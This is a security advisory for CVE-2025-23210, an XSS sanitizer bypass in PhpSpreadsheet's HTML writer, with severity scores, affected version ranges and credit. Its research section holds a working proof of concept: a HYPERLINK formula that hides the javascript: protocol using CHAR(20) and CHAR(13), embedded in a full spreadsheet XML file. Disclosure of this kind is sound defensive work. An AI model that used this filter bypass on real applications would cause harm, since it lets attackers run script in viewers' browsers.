GHSA-r57h-547h-w24f

Source

https://github.com/advisories/GHSA-r57h-547h-w24f

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/02/GHSA-r57h-547h-w24f/GHSA-r57h-547h-w24f.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-r57h-547h-w24f

Aliases

CVE-2025-23210

Published

2025-02-03T15:39:31Z

Modified

2025-03-06T18:38:00.220753Z

Severity

5.4 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N CVSS Calculator
4.8 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N CVSS Calculator

Summary

PhpSpreadsheet allows bypassing of XSS sanitizer using the javascript protocol and special characters

Details

Product: PhpSpreadsheet Version: 3.8.0 CWE-ID: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') CVSS vector v.3.1: 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) CVSS vector v.4.0: 4.8 (AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N) Description: an attacker can use special characters, so that the library processes the javascript protocol with special characters and generates an HTML link Impact: executing arbitrary JavaScript code in the browser Vulnerable component: class PhpOffice\PhpSpreadsheet\Writer\Html, method generateRow Exploitation conditions: a user viewing a specially generated xml file Mitigation: additional sanitization of special characters in a string Researcher: Igor Sak-Sakovskiy (Positive Technologies)

Research

The researcher discovered zero-day vulnerability Bypass XSS sanitizer using the javascript protocol and special characters in Phpspreadsheet. The following code is written on the server, which translates the XML file into an HTML representation and displays it in the response.

Listing 4. Source code on the server

<?php

require __DIR__ . '/vendor/autoload.php';

$inputFileType = 'Xml';
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader($inputFileType);  

$inputFileName = './doc/file.xml';
$spreadsheet = $reader->load($inputFileName); 

$writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet); 
print($writer->generateHTMLAll());

The contents of the xml file - ./doc/file.xml

Listing 5. The contents of the xml file

<?xml version="1.0"?> 
<?mso-application progid="Excel.Sheet"?> 
<Workbook xmlns="urn:schemas-microsoft-com:office:spreadsheet" 
 xmlns:o="urn:schemas-microsoft-com:office:office" 
 xmlns:x="urn:schemas-microsoft-com:office:excel" 
 xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet" 
 xmlns:html="http://www.w3.org/TR/REC-html40"> 
 <DocumentProperties xmlns="urn:schemas-microsoft-com:office:office"> 
  <Author>author</Author> 
  <LastAuthor>author</LastAuthor> 
  <Created>2015-06-05T18:19:34Z</Created> 
  <LastSaved>2024-12-25T10:16:07Z</LastSaved> 
  <Version>16.00</Version> 
 </DocumentProperties> 
 <OfficeDocumentSettings xmlns="urn:schemas-microsoft-com:office:office"> 
  <AllowPNG/> 
 </OfficeDocumentSettings> 
 <ExcelWorkbook xmlns="urn:schemas-microsoft-com:office:excel"> 
  <WindowHeight>11020</WindowHeight> 
  <WindowWidth>19420</WindowWidth> 
  <WindowTopX>32767</WindowTopX> 
  <WindowTopY>32767</WindowTopY> 
  <ProtectStructure>False</ProtectStructure> 
  <ProtectWindows>False</ProtectWindows> 
 </ExcelWorkbook> 
 <Styles> 
  <Style ss:ID="Default" ss:Name="Normal"> 
   <Alignment ss:Vertical="Bottom"/> 
   <Borders/> 
   <Font ss:FontName="Calibri" x:Family="Swiss" ss:Size="11" ss:Color="#000000"/> 
   <Interior/> 
   <NumberFormat/> 
   <Protection/> 
  </Style> 
  <Style ss:ID="s16"> 
   <NumberFormat ss:Format="General Date"/> 
  </Style> 
 </Styles> 
 <Worksheet ss:Name="Лист1"> 
  <Table ss:ExpandedColumnCount="2" ss:ExpandedRowCount="6" x:FullColumns="1" 
   x:FullRows="1" ss:DefaultRowHeight="14.5"> 
   <Column ss:AutoFitWidth="0" ss:Width="194"/> 
   <Row> 
     <Cell ss:Formula="=HYPERLINK (CHAR(20) &amp; &quot;j&quot; &amp; CHAR(13) &amp; &quot;avascript:alert(1)&quot;)"><Data ss:Type="String"></Data></Cell> 
   </Row> 
  </Table> 
  <WorksheetOptions xmlns="urn:schemas-microsoft-com:office:excel"> 
   <PageSetup> 
    <Header x:Margin="0.3"/> 
    <Footer x:Margin="0.3"/> 
    <PageMargins x:Bottom="0.75" x:Left="0.7" x:Right="0.7" x:Top="0.75"/> 
   </PageSetup> 
   <Selected/> 
   <TopRowVisible>1</TopRowVisible> 
   <Panes> 
    <Pane> 
     <Number>3</Number> 
     <ActiveRow>6</ActiveRow> 
    </Pane> 
   </Panes> 
   <ProtectObjects>False</ProtectObjects> 
   <ProtectScenarios>False</ProtectScenarios> 
  </WorksheetOptions> 
 </Worksheet>
</Workbook>

Due to the load with a special character in front of the javascript protocol, the execution flow hits line 1595, not 1593.

Figure 4. Generating a link bypassing a regular expression fig4

In the response from the server, you can see which special character is located in front of the javascript protocol after conversion.

Figure 5. Response from the server with a special character fig5

When viewing the rendered result, a link becomes visible in the browser, and when clicked, the embedded JavaScript code will be executed.

Figure 6. Executing JavaScript code <img width="595" alt="fig6" src="https://github.com/user-attachments/assets/b8ff1aeb-ba3b-49c1-a3b4-9e2cc1fc52d1" />

Credit

Igor Sak-Sakovskiy (Positive Technologies)

Database specific

{
    "nvd_published_at": "2025-02-03T22:15:28Z",
    "cwe_ids": [
        "CWE-79"
    ],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2025-02-03T15:39:31Z"
}

References

Affected packages

Packagist / phpoffice/phpspreadsheet

Package

Name: phpoffice/phpspreadsheet
Purl: pkg:composer/phpoffice/phpspreadsheet

Affected ranges

Type: ECOSYSTEM
Events: Introduced

3.0.0

Fixed

3.9.0

Affected versions

3.*

3.3.0

3.4.0

3.5.0

3.6.0

3.7.0

3.8.0

Packagist / phpoffice/phpspreadsheet

Package

Name: phpoffice/phpspreadsheet
Purl: pkg:composer/phpoffice/phpspreadsheet

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

1.29.9

Affected versions

1.*

1.0.0-beta

1.0.0-beta2

1.0.0

1.1.0

1.2.0

1.2.1

1.3.0

1.3.1

1.4.0

1.4.1

1.5.0

1.5.1

1.5.2

1.6.0

1.7.0

1.8.0

1.8.1

1.8.2

1.9.0

1.10.0

1.10.1

1.11.0

1.12.0

1.13.0

1.14.0

1.14.1

1.15.0

1.16.0

1.17.0

1.17.1

1.18.0

1.19.0

1.20.0

1.21.0

1.22.0

1.23.0

1.24.0

1.24.1

1.25.0

1.25.1

1.25.2

1.26.0

1.27.0

1.27.1

1.28.0

1.29.0

1.29.1

1.29.2

1.29.4

1.29.5

1.29.6

1.29.7

1.29.8

Packagist / phpoffice/phpspreadsheet

Package

Name: phpoffice/phpspreadsheet
Purl: pkg:composer/phpoffice/phpspreadsheet

Affected ranges

Type: ECOSYSTEM
Events: Introduced

2.2.0

Fixed

2.3.7

Affected versions

2.*

2.2.0

2.2.1

2.2.2

2.3.0

2.3.2

2.3.3

2.3.4

2.3.5

2.3.6

Packagist / phpoffice/phpspreadsheet

Package

Name: phpoffice/phpspreadsheet
Purl: pkg:composer/phpoffice/phpspreadsheet

Affected ranges

Type: ECOSYSTEM
Events: Introduced

2.0.0

Fixed

2.1.8

Affected versions

2.*

2.0.0

2.1.0

2.1.1

2.1.3

2.1.4

2.1.5

2.1.6

2.1.7

Packagist / phpoffice/phpexcel

Package

Name: phpoffice/phpexcel
Purl: pkg:composer/phpoffice/phpexcel

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Last affected

1.8.2

Affected versions

1.*

1.7.9-rc1

1.7.9

1.8.0rc1

1.8.0rc2

1.8.0rc3

1.8.0rc4

1.8.0

1.8.1

1.8.2